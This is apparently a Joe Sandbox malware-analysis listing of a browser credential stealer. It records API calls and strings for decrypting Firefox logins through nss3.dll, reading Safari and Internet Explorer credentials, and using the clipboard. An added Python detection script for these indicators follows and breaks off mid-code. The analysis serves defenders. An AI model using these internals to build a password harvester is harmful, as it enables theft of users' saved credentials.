• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
• String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
• API String ID: 2522319644-522817110
• Opcode ID: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
• Instruction ID: 5ad66febf3ba3de4182efca1dfca8304e8a02b444a88a93b5109a45c6fbe2280
• Opcode Fuzzy Hash: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
• Instruction Fuzzy Hash: 0E5153B1940719AAEB20FFA28D49F47B6E8AF58B04F1109ABE549D2141E77CE644CF18
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
• Instruction ID: d236c1b17a1aae76216467299f6e18822a0d202c31a727bef5ceca0d2f67f94c
• Opcode Fuzzy Hash: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
• Instruction Fuzzy Hash: B31184B3D005186BDB00EFA4DC49EDAB7ACEB5A210F454937FA15DB141E638E6448798
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 00417BF2
  • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C19
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C42
• LocalFree.KERNEL32(?), ref: 00417C5D
• free.MSVCRT(?,0044C838,?), ref: 00417C8B
  • Part of subcall function 00416D4F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,73B75970,?,00416E7A,?), ref: 00416D6D
  • Part of subcall function 00416D4F: malloc.MSVCRT ref: 00416D74
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
• Instruction ID: 86e7f975cda22aef79341c94f36a987d619a37d11feed098ff88b3a8796ba2f5
• Opcode Fuzzy Hash: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
• Instruction Fuzzy Hash: BA11B234E01228BBDB11ABA2DD8DCDF7F78EF85750B20005BF40592211E7784A80DBE8
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00408CC4
• FindNextFileW.KERNEL32(00000000,?), ref: 00408CE3
• FindClose.KERNEL32(00000000), ref: 00408D03
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: .$1k@$nss3.dll
• API String ID: 3541575487-3908353483
• Opcode ID: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
• Instruction ID: f3d79de5d6fec64b9baa04ebfd9a669330ca9081903d010b6bc69252f5057639
• Opcode Fuzzy Hash: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
• Instruction Fuzzy Hash: 6CF0BB759005246BDF205B64EC4C6ABB7BCFF45365F000176ED06A71C1D7749D458A98
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
  • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
  • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
• OpenClipboard.USER32(?), ref: 0040F0B6
• GetLastError.KERNEL32 ref: 0040F0CB
• DeleteFileW.KERNEL32(?), ref: 0040F0EA
  • Part of subcall function 00407F9A: EmptyClipboard.USER32 ref: 00407FA4
  • Part of subcall function 00407F9A: GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
  • Part of subcall function 00407F9A: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
  • Part of subcall function 00407F9A: GlobalLock.KERNEL32 ref: 00407FDF
  • Part of subcall function 00407F9A: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
  • Part of subcall function 00407F9A: GlobalUnlock.KERNEL32(00000000), ref: 00408004
  • Part of subcall function 00407F9A: SetClipboardData.USER32(0000000D,00000000), ref: 0040800D
  • Part of subcall function 00407F9A: CloseHandle.KERNEL32(?), ref: 00408021
  • Part of subcall function 00407F9A: CloseClipboard.USER32 ref: 00408035
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
• String ID:
• API String ID: 2633007058-0
• Opcode ID: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
• Instruction ID: d4411bd4de1fade650879fa69a29e8aba7a0aa0f0e0d1894cd1391532f6ebd18
• Opcode Fuzzy Hash: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
• Instruction Fuzzy Hash: 4CF0A4357003006BEA3027359C0EF9B375DDB80714F00453AF852A65D3EE79E8898568
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
• Instruction ID: e5ecc73df534455334d47becca92420b288d3786a246e23e5c2a841cda36e69b
• Opcode Fuzzy Hash: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 17C08C329112208BDB11AB08FE0A7CD72989B0B727F014077E802A2252C7F848048BBC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040233E
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040236E
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040239B
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004023C8
                                                                                                                                                                          • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
                                                                                                                                                                          • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
                                                                                                                                                                        • memset.MSVCRT ref: 0040276C
                                                                                                                                                                        • memcpy.MSVCRT ref: 004027A1
                                                                                                                                                                          • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                          • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                          • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                        • memcpy.MSVCRT ref: 004027FD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040285B
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040286A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                                                                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                        • API String ID: 462158748-1134094380
                                                                                                                                                                        • Opcode ID: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
                                                                                                                                                                        • Instruction ID: 2d0d0591d6411435ed5b4a397348faa82e1f821ad6e98c1f3977ba2ad668a768
                                                                                                                                                                        • Opcode Fuzzy Hash: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
                                                                                                                                                                        • Instruction Fuzzy Hash: FBF1F2218087E9C9DB32C7788C097DEBE655B23324F0443D9D1E87A2D2D7B94B85CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                        • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                                                                                                                                        • API String ID: 2787044678-1843504584
                                                                                                                                                                        • Opcode ID: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
                                                                                                                                                                        • Instruction ID: f322a3b8e7f5a6d162087a7bfffa82d5495360e728e73a59fe9151b9b78652c6
                                                                                                                                                                        • Opcode Fuzzy Hash: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8191B271500219ABEF20DF55CC45FEF776DAF91314F01046AF948A7181EA3CEDA48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00413709
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00413715
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00413724
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00413730
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00413739
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00413745
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00413757
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00413762
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 00413776
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 00413784
                                                                                                                                                                        • GetDC.USER32 ref: 004137BD
                                                                                                                                                                        • wcslen.MSVCRT ref: 004137FD
                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0041380E
                                                                                                                                                                        • ReleaseDC.USER32 ref: 0041385B
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 0041391E
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00413932
                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00413950
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00413986
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00413996
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 004139A4
                                                                                                                                                                        • GetClientRect.USER32 ref: 004139BB
                                                                                                                                                                        • GetWindowRect.USER32 ref: 004139C5
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00413A0B
                                                                                                                                                                        • GetClientRect.USER32 ref: 00413A15
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00413A4D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                                                                                        • API String ID: 2080319088-3046471546
                                                                                                                                                                        • Opcode ID: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
                                                                                                                                                                        • Instruction ID: eaed71e83b935c0691042ece96cd3f4181ba93c5b62309cd5e6c1ba419c0f7d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AB1CE71108701AFDB21DFA8C985A6BBBF9FB88704F004A2EF59582261DB75E904CF56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                        • String ID: WebBrowserPassView
                                                                                                                                                                        • API String ID: 829165378-2171583229
                                                                                                                                                                        • Opcode ID: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
                                                                                                                                                                        • Instruction ID: da1635bf63897f0d85a147e608c4a0468d220b7f7222c61bbc2b07ca64c81474
                                                                                                                                                                        • Opcode Fuzzy Hash: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
                                                                                                                                                                        • Instruction Fuzzy Hash: 4751BF34500B08EBDF22AF60CC45E6E7BB5FB04341F104A3AF952A65F1C7B9A950EB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040AE5E: GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                          • Part of subcall function 0040AE5E: CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
                                                                                                                                                                          • Part of subcall function 0040AF0C: _wcsicmp.MSVCRT ref: 0040AF46
                                                                                                                                                                        • memset.MSVCRT ref: 004071FD
                                                                                                                                                                        • memset.MSVCRT ref: 00407212
                                                                                                                                                                        • _wtoi.MSVCRT ref: 00407306
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040731A
                                                                                                                                                                        • memset.MSVCRT ref: 0040733B
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?), ref: 0040736F
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00407386
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040739D
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073B4
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073CB
                                                                                                                                                                          • Part of subcall function 00407150: _wtoi64.MSVCRT ref: 00407154
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073E2
  • Part of subcall function 00406FCE: memset.MSVCRT ref: 00406FF4
  • Part of subcall function 00406FCE: memset.MSVCRT ref: 00407008
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
  • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
  • Part of subcall function 00406FCE: wcscpy.MSVCRT ref: 0040709D
  • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
  • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$memset$strcpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$logins$null$passwordField$timeCreated$timeLastUsed$timePasswordChanged$timesUsed$usernameField${@
• API String ID: 249851626-1964116028
• Opcode ID: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
• Instruction ID: c3ecdf3b596e70815539cea729ffc079dd9e4b065ea23c8e33f814b0aa12875c
• Opcode Fuzzy Hash: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
• Instruction Fuzzy Hash: 48717FB1D40219AEEF10EBA2DC82DEEB778EF40318F1041BBB514B61D1DA785E548F69
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• {Unknown}, xrefs: 00411492
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0041166F
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
• Instruction ID: 77b13c0c11c75301577e42814f96b51b4b1d428f570956a2458bc96a91f7f52b
• Opcode Fuzzy Hash: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
• Instruction Fuzzy Hash: A17193B280021CBFEF219B51DD45EDA376DEB49355F04407BF608A2162EB79DE848F68
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00411781
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
• SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
• memset.MSVCRT ref: 004117F1
• wcslen.MSVCRT ref: 004117FE
• wcslen.MSVCRT ref: 0041180D
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
• GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
• GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
• GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
• GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
• GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
• GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 004118CC
• GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 004118D8
  • Part of subcall function 00406B51: memset.MSVCRT ref: 00406B72
  • Part of subcall function 00406B51: memset.MSVCRT ref: 00406BBF
  • Part of subcall function 00406B51: RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
  • Part of subcall function 00406B51: wcscpy.MSVCRT ref: 00406D07
  • Part of subcall function 00406B51: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
  • Part of subcall function 00406B51: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
• API String ID: 2554026968-4029219660
• Opcode ID: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
• Instruction ID: 97ddbdf8ae905254a000a89cdfb80c97087349b9056a3f7eb9cac2f120fabdad
• Opcode Fuzzy Hash: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
• Instruction Fuzzy Hash: D2419271940308ABDB20AF61CC85E9AB7F8FF58344F10486FE295D3151EBB8D9848B5C
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00411760: memset.MSVCRT ref: 00411781
  • Part of subcall function 00411760: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
  • Part of subcall function 00411760: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
  • Part of subcall function 00411760: memset.MSVCRT ref: 004117F1
  • Part of subcall function 00411760: wcslen.MSVCRT ref: 004117FE
  • Part of subcall function 00411760: wcslen.MSVCRT ref: 0041180D
  • Part of subcall function 00411760: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
  • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
  • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
  • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
  • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
  • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
  • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
  • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
• memset.MSVCRT ref: 004079D1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
• memset.MSVCRT ref: 00407A23
• memset.MSVCRT ref: 00407A3B
• memset.MSVCRT ref: 00407A53
• memset.MSVCRT ref: 00407A6B
• memset.MSVCRT ref: 00407A83
• wcslen.MSVCRT ref: 00407A8E
• wcslen.MSVCRT ref: 00407A9C
• wcslen.MSVCRT ref: 00407ACB
• wcslen.MSVCRT ref: 00407AD9
• wcslen.MSVCRT ref: 00407B08
• wcslen.MSVCRT ref: 00407B16
• wcslen.MSVCRT ref: 00407B45
• wcslen.MSVCRT ref: 00407B53
• wcslen.MSVCRT ref: 00407B82
• wcslen.MSVCRT ref: 00407B90
• SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
  • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
  • Part of subcall function 0040744D: memset.MSVCRT ref: 0040748C
  • Part of subcall function 0040744D: memset.MSVCRT ref: 0040750B
  • Part of subcall function 0040744D: memset.MSVCRT ref: 00407520
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
• String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
• API String ID: 3287676187-2852686199
• Opcode ID: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
• Instruction ID: 7d0a504a01980ca961e130c4bf0e7e2836c0561e9ae5ad9b50c10663cf81d5b6
• Opcode Fuzzy Hash: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
• Instruction Fuzzy Hash: 1F91947180811DABEF11EF51DC41A9E77B8FF44319F1004ABF908E2191EB79AA548B9A
Uniqueness
Uniqueness Score: -1.00%
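Taken together, the three routines above carry the complete fingerprint of a Firefox credential harvester: the logins.json record keys (encryptedUsername, encryptedPassword, hostname, httpRealm), the runtime resolution of the NSS decryption chain from nss3.dll (NSS_Init, PK11_GetInternalKeySlot, PK11_Authenticate, PK11SDR_Decrypt) and the candidate store files (logins.json, signons.sqlite, signons*.txt). The NSS export names on their own are not suspicious, since nss3.dll exports them and Firefox imports them; it is their co-occurrence with the store file names and the record keys that marks a third-party stealer. The following is an added triage example, not code from the Joe Sandbox report or from the sample, that scans a memory dump for exactly that combination. The dump contents are constructed, and the requirement of PK11SDR_Decrypt plus at least three NSS exports plus one store file plus one record key is this example's own threshold:

```python
"""Triage heuristic for Firefox credential-harvesting code in a memory dump.

Added example; indicators are the strings from the function listing above.
GetProcAddress takes an ANSI name, so the NSS exports are searched as ASCII;
the file and profile names pass through wcslen/LoadLibraryExW/GetFileAttributesW,
so they are also searched as UTF-16LE. The dumps below are constructed stand-ins.
"""
from typing import Dict, List

NSS_EXPORTS = ("NSS_Init", "NSS_Shutdown", "PK11_GetInternalKeySlot", "PK11_FreeSlot",
               "PK11_CheckUserPassword", "PK11_Authenticate", "PK11SDR_Decrypt")
STORE_FILES = ("logins.json", "signons.sqlite", "signons.txt", "signons2.txt", "signons3.txt")
RECORD_KEYS = ("encryptedUsername", "encryptedPassword", "hostname", "httpRealm")
PROFILE_HINTS = ("profiles.ini", "IsRelative", "%programfiles%\\Mozilla Firefox")


def _present(blob: bytes, text: str) -> bool:
    """True if text occurs as a narrow (ASCII) or wide (UTF-16LE) string."""
    return text.encode("ascii") in blob or text.encode("utf-16-le") in blob


def scan_firefox_harvester(blob: bytes) -> Dict[str, List[str]]:
    """Collect, per indicator category, which strings the dump contains."""
    categories = {"nss_exports": NSS_EXPORTS, "store_files": STORE_FILES,
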